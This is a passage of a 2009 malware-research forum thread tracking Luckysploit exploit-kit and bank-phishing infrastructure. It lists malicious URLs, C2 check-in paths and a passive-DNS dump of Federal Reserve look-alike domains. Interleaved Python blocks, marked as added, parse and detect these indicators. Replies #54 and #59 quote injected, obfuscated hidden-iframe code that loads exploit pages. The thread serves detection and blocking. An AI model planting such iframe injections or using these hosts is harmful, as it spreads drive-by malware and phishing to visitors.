Author Topic: another Luckysploit IP  (Read 45509 times)


April 27, 2009, 09:53:43 pm
Reply #45

Malware-Web-Threats

Code: [Select]
hxxp://firstplumb.info/clicksagent2/?t=1&

wepawet fails to analyze this one (URL 404 not found)

Use jsunpack

April 28, 2009, 07:26:51 am
Reply #46

mercutio


April 28, 2009, 05:23:14 pm
Reply #47

michajp

Hello,

Code: [Select]
hxxp://usbanks.server-17.us/bb/?t=2

Micha

April 28, 2009, 05:55:07 pm
Reply #48

michajp

Code: [Select]
hxxp://federalreservebanks.safe-connect.us/bb/?t=2

April 28, 2009, 06:25:02 pm
Reply #49

CM_MWR

Code: [Select]
habrion.cn/in.cgi?3
habrion.cn/lyre/?t=2
habrion.cn/lyre/?1e1b04c40e61519d5f1462487914be7059bd5a76bd82fe3b598493fb47cd15011b6453cb8a25bbdd661b700805daafcbec370ca20fd35c99ebb4108a12c8d698
habrion.cn/lyre/?2922ad60ed42eb2f5e186870d8fe8ad6c84d24f9c29f5b476afe4967aa8cea27b2868035c23438aaa85d50310cc57e29a585c5c640e1eb0a7da917dd386e5933
habrion.cn/lyre/?66b3c685ec9fe6507351e9a007c7bdda110ddcbbdaffb702a8c47d83e10c7d057aa7c205170759158cfeef2b3e54dc307adb46a597277a03021daecb669f430b
habrion.cn/lyre/?52a9b7d8013738a1245946bc142735dbc32d658fb34ae643951c282ae406692c7c06bfd76500242a137b2af34722e1ffd5fb3bbec9673dfba590ab9951d2c9ed
habrion.cn/lyre/?h=5a.0gi?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
bgbtorlopos.com/kitm5/gate.php?id=33c9961a
bgbtorlopos.com/bbv/juyjyuj5.exe
habrion.cn/bm_a/controller.php?action=bot&entity_list=&uid=2&first=1&guid=4108621338&rnd=123
habrion.cn/bm_a/controller.php?action=report&guid=0&rnd=123&uid=2&entity=1240225592:unique_start
habrion.cn/bm_a/controller.php?action=bot&entity_list=1240225592&uid=2&first=0&guid=4108621338&rnd=123
habrion.cn/bm_a/controller.php?action=report&guid=0&rnd=123&uid=2&entity=
bgbtorlopos.com/kitm5/gate.php?id=f4e4961a
aboutmmgftf.com/kitiktk5//data.php?phid=EA05C159D159C148C047BE36AD259D15&lg=ENU&user=DAMIT
aboutmmgftf.com/kitiktk5//info.php?ver=0.01&phid=EA05C159D159C148C047BE36AD259D15&lg=ENU

April 29, 2009, 06:07:19 am
Reply #50

michajp

Code: [Select]
hxxp://usbanks.ebanks-net.us/34733/CM/wire/issue-127932/bb/?t=2
hxxp://usabanks.secureserver-32.us/31107/CM/wire/issue-127431/bb/?t=2
hxxp://federalreservebanks.central-security.us/32394/CM/wire/issue-127835/bb/?t=2
hxxp://federalreserve.secureserver-37.us/37594/CM/wire/issue-127231/bb/?t=2
hxxp://usbanks.1-secure.us/34846/CM/wire/issue-127333/bb/?t=2

April 29, 2009, 12:11:50 pm
Reply #51

michajp

Code: [Select]
hxxp://federalreservebank.1-bank.us/30802/CM/wire/issue-127632/bb/?t=2

April 29, 2009, 12:43:05 pm
Reply #52

Mr Clean

Code: [Select]
hxxp://federalreservebank.1-bank.us/30802/CM/wire/issue-127632/bb/?t=2

anyone care to go fishing?

http://www.bfk.de/bfk_dnslogger.html?query=221.5.74.42#result

Code: [Select]
ns1.secureserver-1.us A 221.5.74.42
ns2.secureserver-1.us A 221.5.74.42
federalreservebanks.secureserver-1.us A 221.5.74.42
frbanks.secureserver-1.us A 221.5.74.42
usbanks.secureserver-1.us A 221.5.74.42
ustreasury.secureserver-1.us A 221.5.74.42
ns1.securenet-1.us A 221.5.74.42
ns2.securenet-1.us A 221.5.74.42
federalreserve.securenet-1.us A 221.5.74.42
ns1.secure-server1.us A 221.5.74.42
ns2.secure-server1.us A 221.5.74.42
federalreserve.secure-server1.us A 221.5.74.42
mail.secure-server1.us A 221.5.74.42
usabanks.secure-server1.us A 221.5.74.42
federalreservebanks.secure-server1.us A 221.5.74.42
frbanks.secure-server1.us A 221.5.74.42
usbanks.secure-server1.us A 221.5.74.42
treasurydept.secure-server1.us A 221.5.74.42
www.secure-server1.us A 221.5.74.42
ustreasury.secure-server1.us A 221.5.74.42
ns1.server-22.us A 221.5.74.42
ns2.server-22.us A 221.5.74.42
federalreservebank.server-22.us A 221.5.74.42
federalreservebanks.server-22.us A 221.5.74.42
frbanks.server-22.us A 221.5.74.42
usbanks.server-22.us A 221.5.74.42
treasurydept.server-22.us A 221.5.74.42
ustreasury.server-22.us A 221.5.74.42
ns1.secureserver-32.us A 221.5.74.42
ns2.secureserver-32.us A 221.5.74.42
federalreservebank.secureserver-32.us A 221.5.74.42
mail.secureserver-32.us A 221.5.74.42
federalreservebanks.secureserver-32.us A 221.5.74.42
www.secureserver-32.us A 221.5.74.42
ustreasury.secureserver-32.us A 221.5.74.42
ns1.server-23.us A 221.5.74.42
ns2.server-23.us A 221.5.74.42
federalreserve.server-23.us A 221.5.74.42
federalreservebank.server-23.us A 221.5.74.42
federalreservebanks.server-23.us A 221.5.74.42
frbanks.server-23.us A 221.5.74.42
usbanks.server-23.us A 221.5.74.42
treasurydept.server-23.us A 221.5.74.42
ustreasury.server-23.us A 221.5.74.42
ns1.secureserver-23.us A 221.5.74.42
ns2.secureserver-23.us A 221.5.74.42
federalreservebanks.secureserver-23.us A 221.5.74.42
ns1.secureserver-33.us A 221.5.74.42
ns2.secureserver-33.us A 221.5.74.42
ns1.secureserver-4.us A 221.5.74.42
ns2.secureserver-4.us A 221.5.74.42
federalreserve.secureserver-4.us A 221.5.74.42
mail.secureserver-4.us A 221.5.74.42
usabanks.secureserver-4.us A 221.5.74.42
federalreservebanks.secureserver-4.us A 221.5.74.42
usbanks.secureserver-4.us A 221.5.74.42
www.secureserver-4.us A 221.5.74.42
ns1.secureserver-34.us A 221.5.74.42
ns2.secureserver-34.us A 221.5.74.42
federalreservebank.secureserver-34.us A 221.5.74.42
ns1.secureserver-44.us A 221.5.74.42
ns2.secureserver-44.us A 221.5.74.42
frbanks.secureserver-44.us A 221.5.74.42
ns1.secureserver-55.us A 221.5.74.42
ns2.secureserver-55.us A 221.5.74.42
mail.secureserver-55.us A 221.5.74.42
fedbanks.secureserver-55.us A 221.5.74.42
usbanks.secureserver-55.us A 221.5.74.42
www.secureserver-55.us A 221.5.74.42
ns1.secureserver-6.us A 221.5.74.42
ns2.secureserver-6.us A 221.5.74.42
frbanks.secureserver-6.us A 221.5.74.42
ns1.server-17.us A 221.5.74.42
ns2.server-17.us A 221.5.74.42
federalreserve.server-17.us A 221.5.74.42
federalreservebank.server-17.us A 221.5.74.42
treasurydept.server-17.us A 221.5.74.42
ns1.secureserver-27.us A 221.5.74.42
ns2.secureserver-27.us A 221.5.74.42
federalreserve.secureserver-27.us A 221.5.74.42
fedbanks.secureserver-27.us A 221.5.74.42
federalreservebanks.secureserver-27.us A 221.5.74.42
frbanks.secureserver-27.us A 221.5.74.42
ns1.secureserver-37.us A 221.5.74.42
ns2.secureserver-37.us A 221.5.74.42
federalreserve.secureserver-37.us A 221.5.74.42
ns1.server-18.us A 221.5.74.42
ns2.server-18.us A 221.5.74.42
treasurydept.server-18.us A 221.5.74.42
ns1.secureserver-28.us A 221.5.74.42
ns2.secureserver-28.us A 221.5.74.42
federalreserve.secureserver-28.us A 221.5.74.42
mail.secureserver-28.us A 221.5.74.42
frbanks.secureserver-28.us A 221.5.74.42
treasurydept.secureserver-28.us A 221.5.74.42
www.secureserver-28.us A 221.5.74.42
ns1.server-19.us A 221.5.74.42
ns2.server-19.us A 221.5.74.42
federalreservebank.server-19.us A 221.5.74.42
fedbanks.server-19.us A 221.5.74.42
federalreservebanks.server-19.us A 221.5.74.42
ustreasury.server-19.us A 221.5.74.42
ns1.secureserver-39.us A 221.5.74.42
ns2.secureserver-39.us A 221.5.74.42
usabanks.secureserver-39.us A 221.5.74.42
federalreservebanks.secureserver-39.us A 221.5.74.42
usbanks.secureserver-39.us A 221.5.74.42
treasurydept.secureserver-39.us A 221.5.74.42
ns1.1-secure.us A 221.5.74.42
ns2.1-secure.us A 221.5.74.42
federalreserve.1-secure.us A 221.5.74.42
usabanks.1-secure.us A 221.5.74.42
treasurydept.1-secure.us A 221.5.74.42
ustreasury.1-secure.us A 221.5.74.42
ns1.1-bank.us A 221.5.74.42
ns2.1-bank.us A 221.5.74.42
mail.1-bank.us A 221.5.74.42
usabanks.1-bank.us A 221.5.74.42
fedbanks.1-bank.us A 221.5.74.42
federalreservebanks.1-bank.us A 221.5.74.42
frbanks.1-bank.us A 221.5.74.42
treasurydept.1-bank.us A 221.5.74.42
www.1-bank.us A 221.5.74.42
ustreasury.1-bank.us A 221.5.74.42
ns1.direct-ebank.us A 221.5.74.42
ns2.direct-ebank.us A 221.5.74.42
federalreservebank.direct-ebank.us A 221.5.74.42
usbanks.direct-ebank.us A 221.5.74.42
treasurydept.direct-ebank.us A 221.5.74.42
ns1.e-banks.us A 221.5.74.42
ns2.e-banks.us A 221.5.74.42
usabanks.e-banks.us A 221.5.74.42
fedbanks.e-banks.us A 221.5.74.42
ns1.safe-connect.us A 221.5.74.42
ns2.safe-connect.us A 221.5.74.42
federalreserve.safe-connect.us A 221.5.74.42
federalreservebanks.safe-connect.us A 221.5.74.42
usbanks.safe-connect.us A 221.5.74.42
ustreasury.safe-connect.us A 221.5.74.42
ns1.e-directconnect.us A 221.5.74.42
ns2.e-directconnect.us A 221.5.74.42
federalreserve.e-directconnect.us A 221.5.74.42
federalreservebank.e-directconnect.us A 221.5.74.42
usabanks.e-directconnect.us A 221.5.74.42
fedbanks.e-directconnect.us A 221.5.74.42
federalreservebanks.e-directconnect.us A 221.5.74.42
ustreasury.e-directconnect.us A 221.5.74.42
ns1.banks-net.us A 221.5.74.42
ns2.banks-net.us A 221.5.74.42
federalreservebank.banks-net.us A 221.5.74.42
mail.banks-net.us A 221.5.74.42
federalreservebanks.banks-net.us A 221.5.74.42
www.banks-net.us A 221.5.74.42
ustreasury.banks-net.us A 221.5.74.42
ns1.ebanks-net.us A 221.5.74.42
ns2.ebanks-net.us A 221.5.74.42
federalreserve.ebanks-net.us A 221.5.74.42
fedbanks.ebanks-net.us A 221.5.74.42
usbanks.ebanks-net.us A 221.5.74.42
treasurydept.ebanks-net.us A 221.5.74.42
ns1.1-security.us A 221.5.74.42
ns2.1-security.us A 221.5.74.42
usabanks.1-security.us A 221.5.74.42
fedbanks.1-security.us A 221.5.74.42
federalreservebanks.1-security.us A 221.5.74.42
frbanks.1-security.us A 221.5.74.42
ns1.central-security.us A 221.5.74.42
ns2.central-security.us A 221.5.74.42
federalreserve.central-security.us A 221.5.74.42
fedbanks.central-security.us A 221.5.74.42
federalreservebanks.central-security.us A 221.5.74.42
frbanks.central-security.us A 221.5.74.42
ustreasury.central-security.us A 221.5.74.42
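
The passive-DNS pivot above (one IP, dozens of look-alike bank and Treasury hostnames, and every domain's own ns1/ns2 sitting on the same address) is the kind of listing worth turning into a blocklist mechanically rather than by hand. The following is an added example, not code from the thread or from bfk.de's tool: it parses a subset of the records quoted above (embedded as constructed input), groups them by registered domain, pulls out the lure labels and the domains whose nameservers resolve to the same IP, and emits hpHosts-style `127.0.0.1 name` lines. All function names are this example's own, and `registered_domain()` is a two-label simplification that happens to be right for these .us names.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the bfk.de passive-DNS records for 221.5.74.42
# quoted in the post above, one "hostname A address" record per line.
PDNS_RECORDS = """\
ns1.secureserver-1.us A 221.5.74.42
federalreservebanks.secureserver-1.us A 221.5.74.42
usbanks.secureserver-1.us A 221.5.74.42
ustreasury.secureserver-1.us A 221.5.74.42
ns1.1-bank.us A 221.5.74.42
mail.1-bank.us A 221.5.74.42
federalreservebanks.1-bank.us A 221.5.74.42
www.1-bank.us A 221.5.74.42
ns2.safe-connect.us A 221.5.74.42
federalreservebanks.safe-connect.us A 221.5.74.42
usbanks.safe-connect.us A 221.5.74.42
federalreserve.central-security.us A 221.5.74.42
"""

# Leftmost labels that describe infrastructure rather than the lure shown to a victim.
INFRA_LABELS = {"ns1", "ns2", "mail", "www"}

RECORD_RE = re.compile(r"^(?P<name>[\w.-]+)\s+(?P<type>[A-Z]+)\s+(?P<ip>\S+)$")


def parse_records(text):
    """Parse 'name TYPE value' lines into (name, type, value) tuples, skipping junk lines."""
    out = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            out.append((m["name"].lower(), m["type"], m["ip"]))
    return out


def registered_domain(hostname):
    """Last two labels. A simplification that is right for these .us names; real code
    should consult the Public Suffix List so that .co.uk or .co.jp names work too."""
    return ".".join(hostname.split(".")[-2:])


def group_by_domain(records, ip):
    """Map registered domain -> set of hostnames whose A record points at `ip`."""
    groups = defaultdict(set)
    for name, rtype, value in records:
        if rtype == "A" and value == ip:
            groups[registered_domain(name)].add(name)
    return dict(groups)


def lure_labels(records, ip):
    """Leftmost labels the operator chose to look like a bank or government name."""
    labels = set()
    for name, rtype, value in records:
        first = name.split(".")[0]
        if rtype == "A" and value == ip and first not in INFRA_LABELS:
            labels.add(first)
    return labels


def self_hosted_ns(records, ip):
    """Domains whose ns1/ns2 names resolve to the same IP as the lure hosts, i.e. the
    operator runs authoritative DNS on the phishing box itself."""
    return {registered_domain(name) for name, rtype, value in records
            if rtype == "A" and value == ip and name.split(".")[0] in ("ns1", "ns2")}


def hosts_file_lines(records, ip):
    """hpHosts-style blocklist: one '127.0.0.1 name' line per hostname and per bare domain."""
    names = set()
    for domain, hosts in group_by_domain(records, ip).items():
        names.add(domain)
        names.update(hosts)
    return ["127.0.0.1 %s" % n for n in sorted(names)]


if __name__ == "__main__":
    recs = parse_records(PDNS_RECORDS)
    for domain, hosts in sorted(group_by_domain(recs, "221.5.74.42").items()):
        print(domain, sorted(hosts))
    print("lures:", sorted(lure_labels(recs, "221.5.74.42")))
    print("self-hosted NS:", sorted(self_hosted_ns(recs, "221.5.74.42")))
    print("\n".join(hosts_file_lines(recs, "221.5.74.42")))
```

The `self_hosted_ns()` result is the durable pivot: every domain in the dump has its ns1/ns2 on 221.5.74.42, so a freshly registered domain whose nameservers land on that address can be blocked before any lure hostname shows up in a phishing mail. Run the block directly to print the grouping and the hosts-file lines.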

April 29, 2009, 12:57:14 pm
Reply #53

RS-232

Just a quick note... exactly two IPs earlier -> proxim.ircgalaxy.pl ;)
http://www.bfk.de/bfk_dnslogger.html?query=221.5.74.40#result
Only for the "fun" of it...rs-232 aka sowhat-x aka younameit ;-)
http://www.youtube.com/watch?v=fADjY97_KTw

May 03, 2009, 04:31:54 pm
Reply #54

Malware-Web-Threats

redirects to luckysploit on 85.17.189.183
Code: [Select]
hxxp://antivirus.vc
Wepawet

with this

Quote
if (!myia){
  document.write(unescape('
%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%61
%6e%74%69%76%69%72%75%73%2e%76%63%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68
%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%31%39%32%30%29%2b%27%38%39%61%61%35%34%66%66%35%27%20
%77%69%64%74%68%3d%37%33%30%20%68%65%69%67%68%74%3d%33%30%34%20%73%74%79%6c%65%3d%27%76%69
%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));
}
var myia = true;

Quote
<iframe name=c26 src='hxxp://antivirus.vc/?'+Math.round(Math.random()*221920)+'89aa54ff5' width=730 height=304 style='visibility:hidden'></iframe>
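
The `document.write(unescape(...))` wrapper above is the usual way of keeping an injected tag out of a plain string search, and decoding it safely means emulating `unescape()` rather than running the script. The following is an added example, not code from the thread or from Wepawet or jsunpack: it implements JavaScript `unescape()` semantics in Python (`urllib.parse.unquote` is close but not identical, since it UTF-8-decodes byte runs and ignores `%uXXXX`), decodes the exact percent-encoded string quoted above, and lists every `<iframe>` with its `src` and a hidden flag (`visibility:hidden`, `display:none`, or a 1-pixel size, which also catches the 1x1 frames posted later in this thread). Function names are this example's own. Note what the decoded text shows: the `+Math.round(Math.random()*221920)+` cache-buster ended up inside the escaped literal rather than as JavaScript, so a browser parses `src='http://antivirus.vc/?'` and treats the remainder as stray attributes; the extractor returns exactly that URL.

```python
import re

# The percent-encoded argument of unescape() from the quoted script above, with the
# forum's line breaks removed (copied from the post, not constructed).
ENCODED = (
    "%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%32%36%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%61"
    "%6e%74%69%76%69%72%75%73%2e%76%63%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68"
    "%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%31%39%32%30%29%2b%27%38%39%61%61%35%34%66%66%35%27%20"
    "%77%69%64%74%68%3d%37%33%30%20%68%65%69%67%68%74%3d%33%30%34%20%73%74%79%6c%65%3d%27%76%69"
    "%73%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e"
)


def js_unescape(s):
    """Emulate JavaScript unescape(): %uXXXX -> one UTF-16 code unit, %XX -> one
    code unit in 0..255, everything else left unchanged."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
# name='value', name="value" or bare name=value; junk between attributes is skipped.
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s'">]+))""")


def _dim(value):
    """Numeric width/height; anything unparseable counts as large (not hidden)."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return 10**6


def extract_iframes(html):
    """Find <iframe> tags and report src plus whether the frame is hidden from the
    user (visibility:hidden / display:none, or a width or height of 1 or less)."""
    found = []
    for tag in IFRAME_RE.finditer(html):
        attrs = {}
        for m in ATTR_RE.finditer(tag.group(1)):
            attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = ("visibility:hidden" in style or "display:none" in style
                  or _dim(attrs.get("width")) <= 1 or _dim(attrs.get("height")) <= 1)
        found.append({"src": attrs.get("src", ""), "hidden": hidden})
    return found


def decode_document_write(encoded):
    """The markup document.write() would have inserted into the page."""
    return js_unescape(encoded)


if __name__ == "__main__":
    html = decode_document_write(ENCODED)
    print(html)
    for frame in extract_iframes(html):
        print(frame)
```

The decoder never evaluates anything, so it is safe to run over a page fetched with a non-browser client; the trade-off is that it only handles this one obfuscation layer, and a script that builds the string with `String.fromCharCode` or arithmetic needs a JavaScript emulator such as the jsunpack mentioned earlier in the thread.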

May 05, 2009, 03:16:22 pm
Reply #55

Malware-Web-Threats

209.44.100.58
Code: [Select]
hxxp://odegda.cv.ua/in.cgi?2&
hxxp://totalmic.if.ua/sx/?t=2

the exploit: Wepawet

May 12, 2009, 03:18:55 pm
Reply #56

michajp

Code: [Select]
hxxp://ustreasury.federalbanksystem.net/31689/FRB/phishing/Issue~73841/
hxxp://ustreasury.federalbanks.us/33704/FRB/phishing/Issue~73624/
hxxp://usbanks.esecure-federal.us/38297/FRB/phishing/Issue~73818/
hxxp://federalreserve-online.com/31419/FRB/phishing/Issue~73574/
hxxp://federalreserve-online.com/37692/FRB/phishing/Issue~73680/
hxxp://federalreserve-online.us/34673/FRB/phishing/Issue~73208/
hxxp://ustreasury.federalbanks.us/36476/FRB/phishing/Issue~73412/
hxxp://ustreasury.federalbanksystem.us/35242/FRB/phishing/Issue~73040/
hxxp://federalreserve-direct.com/32347/FRB/phishing/Issue~73659/
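
The URLs in CM_MWR's Reply #49 (an in.cgi redirect, Luckysploit landing pages, a gate.php check-in, a bot controller, a payload .exe) and michajp's FRB phishing-kit paths in Replies #50 and #56 all follow fixed path templates, which is what a proxy-log detector should key on rather than on hostnames that rotate daily. The following is an added example, not code from the thread: a small rule table with this example's own labels, applied to constructed proxy-log lines that reuse URLs from the posts above plus two benign ones. Rule order matters, because the phishing-kit URLs end in the same `/bb/?t=2` as the exploit-kit landing pages.

```python
import re
from urllib.parse import urlparse

# Each rule is (label, regex tested against path+query). The labels are this example's
# own names, not anything the kits call themselves. Order matters: the FRB phishing-kit
# URLs end in /bb/?t=2, so they must be tested before the generic landing-page rule.
RULES = [
    ("phish-frb-kit",  re.compile(r"/\d{5}/(?:CM/wire/issue-\d+|FRB/phishing/Issue~\d+)/", re.I)),
    ("tds-redirect",   re.compile(r"/in\.cgi\?\d+&?$")),
    ("c2-gate",        re.compile(r"/gate\.php\?id=[0-9a-f]+$", re.I)),
    ("bot-controller", re.compile(r"/controller\.php\?action=(?:bot|report)\b")),
    ("bot-checkin",    re.compile(r"/(?:data|info)\.php\?.*\bphid=[0-9A-Fa-f]{32}\b")),
    ("payload-exe",    re.compile(r"/[\w-]+\.exe$", re.I)),
    ("ek-landing",     re.compile(r"/[\w-]+/\?(?:t=\d+&?$|h=|[0-9a-f]{64,}$)", re.I)),
]


def refang(url):
    """Turn the defanged hxxp:// form used on the forum back into a parseable URL."""
    return re.sub(r"^hxxp", "http", url.strip())


def classify(url):
    """Return the label of the first matching rule, or None if nothing matches."""
    p = urlparse(refang(url))
    target = p.path + ("?" + p.query if p.query else "")
    for label, rx in RULES:
        if rx.search(target):
            return label
    return None


# Constructed proxy-log lines: "timestamp client url". The malicious URLs are the ones
# from the posts above; the last two are benign and should not fire any rule.
PROXY_LOG = """\
1240980001 10.0.0.15 http://habrion.cn/in.cgi?3
1240980002 10.0.0.15 http://habrion.cn/lyre/?t=2
1240980003 10.0.0.15 http://habrion.cn/lyre/?1e1b04c40e61519d5f1462487914be7059bd5a76bd82fe3b598493fb47cd15011b6453cb8a25bbdd661b700805daafcbec370ca20fd35c99ebb4108a12c8d698
1240980004 10.0.0.15 http://bgbtorlopos.com/bbv/juyjyuj5.exe
1240980005 10.0.0.15 http://bgbtorlopos.com/kitm5/gate.php?id=33c9961a
1240980006 10.0.0.15 http://habrion.cn/bm_a/controller.php?action=bot&entity_list=&uid=2&first=1&guid=4108621338&rnd=123
1240980007 10.0.0.15 http://aboutmmgftf.com/kitiktk5//data.php?phid=EA05C159D159C148C047BE36AD259D15&lg=ENU&user=DAMIT
1240980008 10.0.0.22 http://usbanks.1-secure.us/34846/CM/wire/issue-127333/bb/?t=2
1240980009 10.0.0.22 http://ustreasury.federalbanks.us/33704/FRB/phishing/Issue~73624/
1240980010 10.0.0.30 http://www.example.com/index.html
1240980011 10.0.0.30 http://www.example.com/css/style.css?v=3
"""


def scan_log(text):
    """Return (client, url, label) for every log line whose URL matches a rule."""
    hits = []
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue
        _ts, client, url = parts
        label = classify(url)
        if label:
            hits.append((client, url, label))
    return hits


if __name__ == "__main__":
    for client, url, label in scan_log(PROXY_LOG):
        print("%-14s %-12s %s" % (label, client, url))
```

`?t=N` on its own is a weak signature (plenty of benign sites carry a `t=` parameter), so in production the `ek-landing` rule should be combined with the referrer chain (an `in.cgi` redirect immediately before it, as in the first two log lines) or a hostname reputation feed; the table is meant to show the path-template approach, not to serve as a finished signature set.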

May 12, 2009, 05:48:06 pm
Reply #57

MysteryFCM

Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 15, 2009, 06:10:46 am
Reply #58

CkreM

60.29.232.31
(there's 1 listed luckysploit on that IP)

Code: [Select]
sgariiista.com/bb/?t=3
http://wepawet.iseclab.org/view.php?hash=ec4a50b766fdb421f468da5be992490b&t=1242367679&type=js

Code: [Select]
Bolelshiko.com/bb/?t=3
Iiikaolllxxx.net/bb/?t=3
Sdfiiixkoas.net/bb/?t=3
Mal-Aware

May 18, 2009, 09:21:34 pm
Reply #59

Malware-Web-Threats

Several websites are pointing to the domain below with an IFRAME
Quote
<iframe src='hxxp://www.fujifork.co.jp/' width=1 height=1 style='visibility: hidden'></iframe>
<iframe src='hxxp://82.103.131.211/maco/?6e662d941e448da7c36e018acb86120b' width=1 height=1 style=
'visibility: hidden'></iframe>

compromised website used to spread LuckySploit:
Code: [Select]
hxxp://fujifork.co.jp
Wepawet

The IP hosting the LuckySploit:
Code: [Select]
hxxp://82.103.131.211/maco/?6e662d941e448da7c36e018acb86120b
Wepawet link (404 not found)
Jsunpack